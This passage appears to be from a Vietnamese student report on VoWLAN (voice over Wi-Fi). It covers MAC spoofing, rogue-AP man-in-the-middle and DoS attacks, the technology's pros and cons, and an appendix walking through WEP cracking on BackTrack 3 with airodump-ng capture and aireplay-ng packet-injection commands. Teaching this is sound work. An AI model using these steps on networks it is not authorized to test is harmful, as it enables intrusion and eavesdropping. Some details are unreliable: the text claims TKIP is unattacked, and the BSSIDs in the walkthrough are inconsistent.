Truy cập trái phép (unauthorized access) là kiểu tấn công vào quá trình xác thực có tính chủ động. Bằng biện pháp nào đó, kẻ tấn công có được thông tin cần thiết cho quá trình xác thực và trao đổi thông tin của client hay AP hợp pháp. Sau đó sẽ sử dụng những thông tin này để giả danh client hay AP thâm nhập hợp pháp vào mạng.
Biện pháp lọc địa chỉ MAC đôi khi được sử dụng để điều khiển truy nhập mạng. Tuy nhiên nó không được xem như một phương thức bảo mật. Bởi vì kẻ tấn công chỉ cần sử dụng một chương trình nắm bắt gói tin thông thường như NetStumbler cũng có thể biết được địa chỉ MAC hợp pháp sau đó dùng một chương trình khác để giả mạo địa chỉ MAC này, ví dụ như SMAC chẳng hạn. Như vậy kẻ tấn công đã có thể dễ dàng vượt qua biện pháp điều khiển truy nhập này.
Một trong những cách thức tấn công khá phổ biến kiểu truy cập trái phép là tấn công Brute-Force. Kẻ tấn công sử dụng biện pháp thử-sai, xét tất cả các khả năng có thể có của mật khẩu để thử, cho đến khi tìm được mật khẩu chính xác thì thôi. Biện pháp tấn công này có nhiều nhược điểm như đòi hỏi năng lực xử lý của thiết bị phải cao, thời gian tìm ra mật khẩu phụ thuộc vào độ dài và sự phức tạp của mật khẩu.
Hiện nay, với việc sử dụng WPA/WPA2, quá trình xác thực được thực hiện theo cả hai chiều và thông tin dữ liệu trao đổi được bảo đảm an toàn hơn rất nhiều. Cơ chế mã hóa TKIP/RC4 có khả năng chống đỡ rất cao trước các hình thức tấn công mạng. Cho dù kẻ tấn công bằng biện pháp nào đó có thể giả mạo địa chỉ MAC, nắm bắt các gói tin, song thông tin có ích thật sự lại không thể tìm ra được.
Một nguy cơ rất lớn đối với VoWLAN đó chính là việc bị chiếm dụng tài nguyên mạng. Hiện nay có ba phương pháp được sử dụng để đảm bảo tính hợp pháp của thiết bị đầu cuối VoWLAN đó chính là dựa vào địa chỉ MAC, khóa bảo mật và chứng thực số. Tuy nhiên, như chúng ta đã biết địa chỉ MAC có thể bị giả mạo một cách dễ dàng. Trong khi đó khóa bảo mật có thể được sử dụng là WEP hay WPA/WPA2. WEP ngày nay vẫn được sử dụng khá phổ biến do yêu cầu về tính tương thích với thiết bị cũ và thông tin tiêu đề bổ sung của nó nhỏ (cỡ 8 byte so với TKIP là 20 byte). WPA/WPA2 chứng minh được tính bảo mật cao hơn nhiều. Thực tế cho thấy hiện nay chưa có nghiên cứu hay báo cáo nào chỉ ra rằng TKIP/RC4 hay CCMP/AES có thể bị tấn công như đối với WEP. Biện pháp duy nhất để kẻ tấn công lấy được khóa bảo mật đó là bằng con đường social engineering. Cả hai cơ chế bảo mật trên, sử dụng địa chỉ MAC và khóa bảo mật đều không thể đảm bảo tính duy nhất và hợp pháp của thiết bị đầu cuối. Chứng thực số khắc phục được những nhược điểm này. Chứng thực số là số nhận dạng duy nhất đối với từng thiết bị đầu cuối, không thể bị làm giả. Tuy nhiên, nó yêu cầu năng lực xử lý cao của cả đầu cuối client cũng như AP, trong một số trường hợp yêu cầu thêm hệ thống PKI phải được bổ sung vào kiến trúc mạng, tăng thêm độ phức tạp. Việc sử dụng chứng thực số mới chỉ hình thành trên cơ sở lý thuyết. Trên thực tế chưa có một sản phẩm nào mang tính thương mại áp dụng cơ chế này. Hơn thế nữa, do đặc tính di động của đầu cuối VoWLAN, khả năng thiết bị bị mất hay đánh cắp là rất cao.
2.2.3. Tấn công theo kiểu Man-in-the-middle
Tấn công man-in-the-middle là khi kẻ tấn công sử dụng một AP để ánh lừa các node di động kết nối tới AP đó bằng các phát tín hiệu mạnh hơn AP hợp pháp. Quá trình tấn công như sau:
-Kẻ tấn công kích hoạt một AP lên, AP này có thể là máy tính của kẻ tấn công, hoạt động thông qua phần mềm giả lập AP.
-Kẻ tấn công cấu hình AP này có cùng SSID như của mạng WLAN mà nạn nhân đang kết nối tới.
-Sau đó kẻ tấn công sẽ gửi một khung yêu cầu xác thực lại (hoặc tạo ra một nguồn phát tín hiệu lớn gây nhiễu để buộc nạn nhân phải thực hiện kết nối lại), ép nạn nhân tìm kiếm một AP mới để kết nối.
-Bởi vì AP của kẻ tấn công ở gần nạn nhân hơn và tạo ra tín hiệu tốt hơn nên thông thường thiết bị của nạn nhân sẽ chọn kết nối tới AP của kẻ tấn công, trong khi đó nạn nhân vẫn ngỡ mình đang được kết nối tới AP hợp pháp.
Việc kết nối tới AP giả mạo được xem như là một phần của chuyển vùng (roaming) nên người dùng không hề biết được.
Hình 2.7. Tấn công kiểu man-in-the-middle
Kẻ tấn công trước tiên phải sử dụng SSID mà các client đang sử dụng (giá trị này dễ dàng có được), và cũng phải có khóa WEP nếu mạng sử dụng WEP.
Tiếp nữa, kẻ tấn công có thể sử dụng một card mạng thứ hai kết nối với AP hợp pháp, kẻ tấn công sẽ cấu hình cho hai card mạng này hoạt động bridging với nhau. Như vậy, máy của kẻ tấn công chính là người đứng giữa, hoạt động giữa client và AP hợp pháp. Nạn nhân vẫn có thể truy cập Internet hay các dịch vụ khác do AP hợp pháp cung cấp. Trong khi đó, kẻ tấn công có thể thực hiện rất nhiều các hình thức tấn công tới thiết bị của nạn nhân, bao gồm cả hoạt động giám sát thông tin trao đổi.
Với kiểu tấn công này, người dùng rất khó để có thể phát hiện ra. Lượng thông tin mà kẻ tấn công thu thập được phụ thuộc vào thời gian duy trì được trạng thái này. Để chống lại cách tấn công này, cách tốt nhất là sử dụng hệ thống phát hiện xâm nhập (IDS - Intrusion Detection System). Hệ thống này có thể phát hiện ra các dấu hiệu bất thường của mạng và giúp người quản trị xử lý kịp thời.
2.2.4. Tấn công từ chối dịch vụ
Tấn công từ chối dịch vụ DoS có thể chia thành hai loại: DoS lớp vật lý và DoS lớp liên kết dữ liệu.
Tấn công DoS lớp vật lý được thực hiện bằng cách gây nhiễu tín hiệu vô tuyến. Kẻ tấn công có thể sử dụng một thiết bị phát tín hiệu vô tuyến hoạt động trong dải băng tần mà mạng WLAN mục tiêu sử dụng, phát ra tín hiệu với công suất lớn hơn rất nhiều và ở khoảng cách gần AP mục tiêu. Từ đó sẽ gây ra nhiễu vô tuyến, làm cho chất lượng tín hiệu suy giảm rõ rệt, trong trường hợp xấu nhất sẽ làm mất hoàn toàn tín hiệu. Đôi khi trong thực tế cũng có những thiết bị gây nhiễu không nhằm mục đích xấu như lò vi sóng, điện thoại không dây hay các mạng WLAN lân cận hoạt động trong băng tần mà mạng WLAN sử dụng. Tuy nhiên, biện pháp tấn công từ chối dịch vụ DoS lớp vật lý thường không được sử dụng phổ biến do chi phí mua thiết bị gây nhiễu tương đối cao và không tiện dụng, trong khi vẫn có những cách tấn công DoS khác khá hiệu quả, điển hình như tấn công DoS lớp liên kết dữ liệu!
Hình 2.8. Tấn công DoS lớp Vật lý
Tấn công DoS lớp Liên kết dữ liệu được thực hiện bằng nhiều cách, như: phát tràn ngập các khung hủy xác thực hay hủy kết hợp, các khung dữ liệu rỗng, vv… Khi kẻ tấn công phát liên tiếp các khung hủy xác thực và hủy kết hợp, sử dụng địa chỉ MAC giả mạo của AP hợp pháp, thiết bị thu phát tín hiệu của nạn nhân sẽ không thể kêt nối đến AP để gia nhập vào mạng WLAN. Biện pháp tấn công này có hiệu quả cao hơn so với việc sử dụng các khung dữ liệu rỗng. Khi sử dụng phát liên tiếp nhiều khung dữ liệu rỗng trên nhiều card mạng không dây, mục đích của kẻ tấn công là nhằm chiếm dụng băng thông kết nối. Biện pháp này hiệu quả đạt được tỉ lệ thuận với khoảng cách đến thiết bị nạn nhân hoặc AP, công suất phát và số lượng card mạng được sử dụng.
Hình 2.9. Tấn công DoS lớp Liên kết dữ liệu
Một biến thể khác của tấn công từ chối dịch vụ DoS lớp 3 là DDoS. Theo đó, kẻ tấn công sẽ tìm cách xâm nhập và cài đặt các mã độc hại lên nhiều thiết bị trong toàn mạng WLAN bằng con đường phát tán thư rác, dụ dỗ nạn nhân kích vào đường link chứa mã độc hại. Một khi thiết bị nào đó khi đã bị dính mã độc hại này, nó sẽ kích hoạt một chương trình thoại qua VoIP như Yahoo!Messenger hay Skype để tạo ra lưu lượng thoại nhằm mục đích chiếm dụng tài nguyên mạng. Bản thân thiết bị này sau đó cũng có thể trở thành nguồn lây nhiễm thứ cấp cho công việc phát tán mã độc hại. DDoS có sức phá hoại cao hơn DoS nhiều lần.
Triệu chứng dễ nhận thấy nhất khi bị tấn công DoS là sự suy giảm tín hiệu một cách rõ rệt và bất thường. Để khắc phục kiểu tấn công này, có thể sử dụng các thiết bị phân tích phổ tín hiệu nhằm phát hiện ra vị trí các phần tử gây nhiễu sau đó di dời chúng đi nơi khác. Hoặc có thể dùng phương pháp quản trị như chia VLAN, thiết lập Policy. Chia VLAN dựa trên đặc tính của ứng dụng, có thể thiết lập từng VLAN dành riêng cho các kiểu lưu lượng khác nhau như VLAN thoại, VLAN dữ liệu,… Thiết lập Policy cho từng nhóm đối tượng với các quyền hạn truy nhập khác nhau, mức độ ưu tiên chiếm dụng tài nguyên khác nhau.
Kết luận chương 2
Tương tự như WLAN, hệ thống VoWLAN cũng có nhiều nguy cơ bị tấn công. Tuy nhiên, khác với WLAN, việc bảo mật trong hệ thống VoWLAN cần phải được tính toán cân đối giữa hai yếu tố an toàn và tốc độ, bởi vì mạng càng được tăng cường bảo mật thì độ trễ của mạng càng tăng cao, ảnh hưởng đến đường thoại trong mạng.
Chương 3: KẾT LUẬN VỀ CÔNG NGHỆ VOWLAN
3.1. Ưu nhược điểm của công nghệ VoWLAN
Công nghệ VoWLAN ra đời đã là sự kết hợp một cách hài hòa giữa WLAN và VoIP. Cũng chính vì lẽ đó, bên cạnh việc hội tụ những ưu điểm của cả hai công nghệ kể trên nó còn hứng chịu tác động bất lợi cũng chính từ hai công nghệ này mang lại.
3.1.1. Ưu điểm
3.1.1.1. Ưu điểm kế thừa từ công nghệ VoIP
Điện thoại IP ra đời nhằm khai thác tính hiệu quả của các mạng truyền số liệu và tính linh hoạt trong việc phát triển các ứng dụng mới của giao thức IP và làm cho khả năng các dịch vụ được cung cấp trên một mạng thống nhất toàn cầu trở thành hiện thực. VoIP có các ưu điểm chính so với thoại truyền thống như sau:
-Giảm cước dịch vụ điện thoại đường dài.
-Cho phép thực hiện nhiều cuộc gọi hơn, giảm độ rộng băng thông cho mỗi kết nối.
-Hỗ trợ thêm nhiều dịch vụ bổ sung khác và giúp triển khai các dịch vụ mới nhanh chóng, dễ dàng và tự động.
-Sử dụng hiệu quả nhất những ưu thế của giao thức IP là tính mềm dẻo và dễ dàng tương thích.
Ưu điểm nổi bật của dịch vụ VoIP đối với khách hàng là giá cước rẻ hơn nhiều so với thoại truyền thống do các cuộc gọi VoIP sử dụng lượng băng thông rất ít. Trong khi thoại truyền thống sử dụng kỹ thuật số hóa PCM theo chuẩn G.711 với lượng băng thông cố định cho một kênh thoại là 64 kbps thì VoIP sử dụng kiểu mã hóa nguồn như CS-CELP theo chuẩn G.729 yêu cầu tốc độ 8 kbps, hay G.723 chỉ yêu cầu 5.3/6.3 kbps. Như vậy, rõ ràng là lượng băng thông sử dụng đã giảm được một cách đáng kể.
Ngoài ra, do VoIP sử dụng cơ chế triệt khoảng lặng nên có thể tiết kiệm thêm lượng băng thông này để truyền các dạng thông tin khác. Đó là một ưu điểm lớn của VoIP so với điện thoại chuyển mạch kênh truyền thống. Thông thường, băng thông truyền dẫn cần thiết cho một cuộc gọi PSTN có thể sử dụng cho 4 đến 6, thậm chí 8 cuộc gọi VoIP.
Nếu để ý chi phí cho cuộc gọi theo từng phút ta sẽ thấy lượng tiền tiết kiệm được quả là không nhỏ. Tuy nhiên, việc tiết kiệm chi phí còn tùy thuộc vào vùng địa lý và khoảng cách. Đối với các cuộc gọi nội hạt thì việc tiết kiệm này có vẻ không quan trọng, nhưng đối với các cuộc gọi đường dài, nhất là cuộc gọi quốc tế thì nó thật sự là đáng kể. Điều này được thể hiện ở giá cước mà các nhà cung cấp dịch vụ đưa ra, thông thường giảm còn 1/10 đối với các cuộc gọi quốc tế.
Ưu điểm tiếp theo là khả năng quản lý băng thông. Trong mạng điện thoại sử dụng công nghệ chuyển mạch kênh, tài nguyên băng thông cung cấp cho một cuộc gọi là cố định. Trong mạng IP tài nguyên cung cấp cho một cuộc gọi mềm dẻo và linh hoạt hơn nhiều. Khi người sử dụng cần tài nguyên để thực hiện một cuộc gọi, nếu lưu lượng của mạng thấp, băng thông dành cho cuộc gọi sẽ cho chất lượng tốt nhất. Vào thời gian cao điểm, mạng sẽ hạn chế băng thông của từng cuộc gọi ở mức chấp nhận được nhằm phục vụ cùng lúc nhiều người nhất.
Ưu điểm nữa của VoIP là khả năng dễ dàng kết hợp các loại dịch vụ thoại, dữ liệu và video. Thoại và fax chỉ là các ứng dụng khởi đầu cho VoIP, các ứng dụng mong đợi trong tương lai là đa phương tiện và đa dịch vụ. Trong khi tiến hành đàm thoại, người sử dụng có thể vừa nói chuyện vừa sử dụng các dịch vụ khác như truyền file, chia sẻ dữ liệu hay xem hình ảnh của người bên kia.
Mạng Internet đang bùng nổ trên toàn thế giới và ngày càng có nhiều ứng dụng được phát triển trên nền giao thức IP. Việc triển khai VoIP không đòi hỏi nâng cấp cơ sở hạ tầng mạng một cách phức tạp, các thiết bị bổ sung tương đối rẻ và việc cài đặt, bảo dưỡng cũng đơn giản. Đa số các hãng viễn thông lớn trên thế giới như Cisco, Juniper, Alcatel, Siemens, … đều đã cung cấp các giải pháp cả phần cứng và phần mềm hỗ trợ cho VoIP. Các giải pháp này có thể tương thích với hầu hết các chuẩn giao thức hiện nay.
3.1.1.2. Ưu điểm kế thừa từ công nghệ WLAN
Nếu như công nghệ VoIP nói chung giúp cho VoWLAN giải quyết các vấn đề về băng thông và chi phí đầu tư thì công nghệ WLAN lại giải quyết vấn đề về khả năng di động và roaming, một trong những yêu cầu vô cùng quan trọng đối với khách hàng.
Ưu điểm đầu tiên phải kể đến của công nghệ WLAN đó chính là tính năng di động cung cấp cho các thiết bị đầu cuối. Người sử dụng có thể dùng laptop có cài phần mềm hỗ trợ tính năng thiết lập cuộc gọi, ví dụ như Skype chẳng hạn, hay một điện thoại di động cầm tay hoạt động được trong dải tần của sóng wifi. Hiện nay trên thị trường đã xuất hiện rất nhiều mẫu điện thoại hoạt động tốt ở cả hai chế độ (wifi và mạng thông tin di động), hay điện thoại một chế độ wifi. Tất cả các sản phẩm này nhìn chung đều thân thiện với người sử dụng.
Một trong những điểm nổi trội của công nghệ VoWLAN so với VoIP thông thường đó chính là khả năng roaming. Thiết bị đầu cuối ngay cả khi đang trong quá trình đàm thoại vẫn không bị gián đoạn kết nối khi di chuyển từ vung che phủ sóng wifi của AP này sang AP khác. Tuy nhiên, kỹ thuật roaming hiện nay vẫn chưa được chuẩn hóa mang tính quốc tế, các nhà sản xuất tự xây dựng cho mình cách thức để hỗ trợ roaming riêng, do đó, để đảm bảo tính năng này có thể hoạt động tốt thì yêu cầu sử dụng các AP của cùng một nhà sản xuất là rất cần thiết, trong khi chờ đợi chuẩn 802.11r được IEEE thông qua.
Thuận lợi nữa là, thậm chí có nhiều thiết bị cho phép chúng ta thực hiện các cuộc gọi qua Wi-Fi hay mạng di động, với điện thoại có khả năng chuyển từ kết nối này sang kết nối khác một cách nhanh chóng. (Những điện thoại này được gọi là thiết bị FMC – Fixed-Mobile Converenge - Công nghệ mạng hội tụ di động và cố định.) Điều đó có nghĩa là chúng ta có thể bắt đầu một cuộc gọi di động sau đó chuyển tiếp sang mạng wifi mà không bị ngắt kết nối, ngay cả khi trong vùng che phủ của sóng wifi không tồn tại tín hiệu sóng di động.
Đối với các doanh nghiệp lớn, việc sử dụng điện thoại có chức năng VoWLAN chứng tỏ được rất nhiều ưu thế. Đầu tiên đó chính là việc tận dụng được cơ sở hạ tầng mạng máy tính sẵn có, giảm thiểu chi phí đầu tư, tăng cường tính linh hoạt. Việc roaming trong những mô hình mạng cơ lớn như vậy được thực hiện tương đối dễ dàng do quá trình thiết kế mạng đồng bộ và chuyên nghiệp.
Một ưu điểm cuối cùng là thiết bị đầu cuối VoWLAN tương đối nhỏ gọn so với điện thoại để bàn (bao gồm cả công nghệ PSTN và VoIP) hay đơn giản hơn nó có thể chỉ là một phần mềm ứng dụng được tích hợp trên laptop. Kích thước tương đương một máy điện thoại di động thông thường, có khả năng kết nối wifi phục vụ cho nhu cầu thoại và truyền dữ liệu, đó chính là ưu điểm dễ nhận thấy nhất đối với một chiếc điện thoại VoWLAN.
3.1.2. Nhược điểm
3.1.2.1. Các nhược điểm xuất phát từ công nghệ VoIP
Bên cạnh các ưu điểm, VoIP cũng có những nhược điểm đặc trưng của thoại gói như:
-Giao thức IP là không tin cậy và không hỗ trợ QoS.
-Thời gian trễ truyền lan trên mạng có thể vượt quá giới hạn cho phép làm ảnh hưởng đến chất lượng thoại.
-Độ trễ không đồng nhất giữa các gói tin gây ra hiện tượng jitter.
Nhược điểm cơ bản của VoIP so với thoại truyền thống là chất lượng dịch vụ. Nguyên nhân chính gây ra hạn chế về chất lượng dịch vụ là do mạng IP hoạt động theo nguyên tắc nỗ lực tối đa và không tin cậy, tức là nó không đảm bảo chất lượng dịch vụ cho các ứng dụng. Mức độ phức tạp của mạng cũng như chất lượng các kết nối mạng cũng là yếu tố làm giảm chất lượng dịch vụ.
Một yếu tố nữa cũng ảnh hưởng tới chất lượng dịch vụ VoIP là do nó phải chia đường truyền cùng lúc với nhiều dịch vụ khác nhau trên mạng mà không có một đặc trưng riêng biệt nào để các bộ định tuyến có thể nhận biết và xử lý ưu tiên hơn. Tuy trong phần tiêu đề của gói tin IP cũng có các trường để chỉ mức độ ưu tiên, các yêu cầu về độ trễ, số lượng, độ an toàn nhưng do vẫn còn có sự không thống nhất giữa các nhà cung cấp dịch vụ về một số vấn đề nên IP hỗ trợ mức ưu tiên không đồng nhất và không có giao thức định tuyến tham số dịch vụ.
Cũng như các giao thức truyền số liệu khác, thiết kế ban đầu của giao thức IP không phải để truyền các thông tin thời gian thực. Việc truyền tín hiệu thời gian thực trên mạng chuyển mạch gói một cách liên tục với tốc độ không đổi là rất khó thực hiện do các hiện tượng như mất gói hay độ trễ không ổn định. Kỹ thuật truyền lại các gói bị mất hay bị lỗi là không có ý nghĩa đối với các dịch vụ thời gian thực.
Tất cả các ISP đều cố gắng tối thiểu hóa thời gian truyền gói theo khả năng của mình mà không quan tâm đến năng lực của các ISP khác. Vì vậy, nếu các điểm cuối của cuộc gọi VoIP được phục vụ bởi các ISP khác nhau thì rất có thể xảy ra hiện tượng trễ chiều đi và chiều về là khác nhau, hay không đối xứng. Ngoài ra, cơ chế định tuyến của IP có thể gây ra các vòng định tuyến dẫn đến thời gian trễ quá lớn đối với một cuộc gọi thoại, và gói tin mặc dù đến nơi nhưng cũng không còn ý nghĩa nữa.
Để cho chất lượng dịch vụ chấp nhận được, cần phải có một kỹ thuật nén tín hiệu với tỉ số nén lớn, khả năng tái tạo các gói bị thất lạc, và cơ chế bộ đệm nhận các gói ở phía thu để giải quyết vấn đề trễ nối tiếp của các gói trong quá trình truyền lan. Tốc độ xử lý của các bộ mã hóa/giải mã phải nhanh để cuộc gọi không bị gián đoạn. Đồng thời cơ sở hạ tầng mạng cũng phải được nâng cấp lên các công nghệ mới và phải có cơ chế kiểm soát chất lượng dịch vụ.
3.1.2.2. Nhược điểm từ mạng WLAN mang lại
Nhược điểm đầu tiên và lớn nhất phải kể đến của mạng WLAN chính là khả năng bảo mật. Bởi vì môi trường truyền dẫn mà công nghệ này sử dụng là sóng vô tuyến, không hề bị hạn chế đơn giản về mặt vật lý như các mạng có dây khác. Sóng wifi lan truyền tự do trong không gian, kẻ tấn công chỉ cần một thiết bị đầu cuối với anten có độ hướng tính cao là hoàn toàn có thể thu được tín hiệu mặc dù ở khoảng cách địa lý tương đối xa. Hơn nữa việc sử dụng sóng điện từ làm môi trường truyền dẫn cũng rất dễ bị gây nhiễu bởi các nguồn phát khác bao gồm cả vô tình hay cố ý (tấn công DoS vật lý). Nhìn chung, do đặc thù của mạng wifi nên những hạn chế trên là không thể tránh khỏi, chúng ta chỉ có thể hạn chế đến mức tối đa khả năng gây hại của chúng bằng cách sử dụng các biện pháp như mã hóa dữ liệu, dò tìm và cách ly nguồn gây nhiễu, kết hợp với các quy định về pháp luật do Nhà nước ban hành.
Tiếp theo, đó chính là sự hạn chế về mặt băng thông. Với một AP hoạt động theo chuẩn 802.11b chỉ có khả năng phục vụ tốt cho khoảng 12 cuộc gọi đồng thời, không tính đến sự có mặt của các kết nối dữ liệu.Thực tế, các mô hình mạng WLAN luôn là sự kết hợp của cả truyền dẫn dữ liệu và tín hiệu thoại, do đó việc chia tách VLAN cho ít nhất hai dạng tín hiệu này là vô cùng cần thiết. VLAN thoại cần được cài đặt có mức độ ưu tiên cao hơn so với dữ liệu. Hiện nay, IEEE đang xây dựng chuẩn 802.11n cho phép băng thông có thể lên tới 600 Mbps, dự kiến sẽ được thông qua vào đầu năm 2009.
Thứ ba là khả năng roaming tương đối kém. Các AP chỉ có thể hỗ trợ roaming tốt khi thuộc cùng một nhà sản xuất. Hiện tại vẫn chưa có chuẩn chung nào quy định về vấn đề này, các giải pháp đang được sử dụng đều do các hãng tự thiết kế theo giao thức của riêng mình, khả năng thích ứng lẫn nhau là rất kém. Chuẩn 802.11r vẫn đang được IEEE xây dựng để giải quyết vấn đề này. Cho đến khi 802.11r được thông qua thì biện pháp tốt nhất là sử dụng các sản phẩm một cách đồng bộ, của cùng một nhà sản xuất uy tín trên thị trường.
Khả năng chuyển tiếp cuộc gọi giữa mạng Wifi và các mạng không dây khác như GSM, 3G, WiMAX, … cho dù đã và đang được nghiên cứu rất nhiều xong một giải pháp hoàn toàn ổn định và đáng tin cậy vẫn chưa được đưa ra. Tất cả mới chỉ dừng lại ở mức độ thử nghiệm để tiếp tục phát triển.
Sự ra đời của VoWLAN làm cho việc quản lý mạng viễn thông càng trở nên phức tạp hơn. Việc tính cước cuộc gọi sao cho đúng đắn là cả một vấn đề đầy thách thức và nhạy cảm. Một khi người sử dụng thấy được sự tiện dụng và kinh tế mà VoWLAN mang lại, đồng thời khi chất lượng cuộc gọi được cải thiện hơn nữa, thì nó sẽ gây bất lợi cho các nhà cung cấp dịch vụ di động khác nhờ tính cạnh tranh về giá cước của mình.
Cuối cùng, hiện nay, giá thiết bị đầu cuối VoWLAN vẫn còn quá cao so với những gì mà nó mang lại. Một số nhà cung cấp phần cứng như Cisco, Nokia hay nhà cung cấp dịch vụ như Skype, T-Mobile đã tung ra thị trường nhiều dòng sản phẩm hỗ trợ VoWLAN ở cả chế độ đơn hay đa chế độ.
3.2. Tổng kết
Có thể nói VoWLAN không phải là một công nghệ gì đó mang tính đột phá và hoàn toàn mới mẻ. Nó đơn giản chỉ là sự kết hợp mềm dẻo giữa VoIP và WLAN để mang đến sự tiện dụng và chi phí rẻ cho người sử dụng đầu cuối. Một khi hạ tầng mạng WLAN phát triển đầy đủ và phổ biến thì sự ra đời và lớn mạnh của VoWLAN sẽ như một sự tất yếu. Tất nhiên, người ta sẽ không bao giờ bỏ kinh phí ra đầu tư một mạng WLAN tốt chỉ để nhằm mục đích phục vụ cho việc tận dụng công nghệ thoại qua WLAN. VoWLAN chỉ có thể phát triển được một khi mạng WLAN phát triển.
Bởi vì tín hiệu thoại được truyền đi dưới dạng sóng vô tuyến, do đó, VoWLAN phải đối mặt với rất nhiều những nguy cơ tấn công, bao gồm cả vô tình và có mục đích. Khả năng bị nghe lén cuộc gọi là không thể tránh khỏi. Song, nếu được áp dụng các công nghệ và tuân thủ các tiêu chuẩn nghiêm ngặt của các chuẩn quốc tế như IEEE 802.11i hay WPA/WPA2 của Wifi Allience đưa ra thì sẽ giảm thiểu được hầu hết các nguy cơ tấn công này.
Cũng như mọi công nghệ khác, VoWLAN mang trong mình vô số ưu điểm song cũng không tránh khỏi những nhược điểm. Do đó, tương lai của công nghệ không thể đơn giản dự đoán trước được, nó chỉ có thể đứng vững trong cuộc sống một khi được người sử dụng đánh giá cao và thực sự được chấp nhận.
Phụ lục: BẺ KHÓA WEP SỬ DỤNG BACK TRACK 3
I. Chuẩn bị
1.Access Point cấu hình sẵn WEP key 64 bit.
2.PC có card wireless chipset được chương trình aircrack-ng hỗ trợ, xem chi tiết tại http://www.aircrack-ng.org).
3.Hệ điều hành Back Track 3 Final.
II. Các bước thực hiện
Khởi động vào Back Track 3
Chuẩn bị cho card wifi:
Đầu tiên ta bật Monitor Mode trên card wifi. Các câu lệnh như sau:
#airmon-ng (kiểm tra card mạng)
#modprobe -r iwl3945
#modprobe ipwraw
Tiếp theo ta tắt card wifi, thay đổi địa chỉ MAC, rồi bật card wifi lên lại
Tấn công mục tiêu:
Giờ ta xác định một mạng WEP thích hợp:
# airodump-ng wifi0
Ghi chú lại thông tin MAC address (BSSID), channel (CH) và name (ESSID) của mạng muốn tấn công.
Giờ ta thu thập data từ access point để tấn công: dùng airodump-ng để bắt các gói tin:
#airodump-ng -c 6 -w wep --bssid 00:1A:70:34:6F:CC eth0
-c 6 channel 6
-w wep ghi dữ liệu bắt được vào file có tên wep lưu mặc
định trong thư mục home/ của user.
--bssid 00:1D:7E:B0:47:DE giá trị BSSID của AP mục tiêu
Kết quả hiện ra màn hình như sau:
Giờ ta tạo các gói giả mạo đến access point để nó tăng tốc độ dữ liệu đi ra, ta dùng lệnh sau:
#aireplay-ng -1 0 –a 00:1D:7E:B0:47:DE –h 00:11:22:33:44:55 wifi0
Câu lệnh trên thành công, ta dùng lệnh sau để bơm gói tin vào mạng đích:
#aireplay-ng -3 –b 00:1D:7E:B0:47:DE –h 00:11:22:33:44:55 wifi0
Kết quả sau khi bơm gói tin, số lượng gói dữ liệu bắt được tăng lên nhanh chóng!
Khi đã bắt đủ các gói tin (khoảng trên 16000 gói), ta có thể bắt đầu tìm khóa:
Kết quả:
Như vậy ta đã tìm được WEP key là 0123456789
TÀI LIỆU THAM KHẢO
1.Jim Geier, Deploying Voice over Wireless LANs, Cisco Press, 2007
2.Frank Ohrtman, Voice over 802.11, Artech House, 2004
3.Leif Madsen - Jared Smith - Jim Van Meggelen, The Future of Telephony, O'Reilly, 2005
4.TS Trần Công Hùng, VoIP, Học việc Công nghệ BCVT cơ sở HCM, 2006
5.Planet3 Wireless Inc., The Official CWNA Study Guide, 2002
6.Các website liên quan:
http://www.wifipro.org
http://www.vnpro.org
Đăng ký:
Bài đăng (Atom)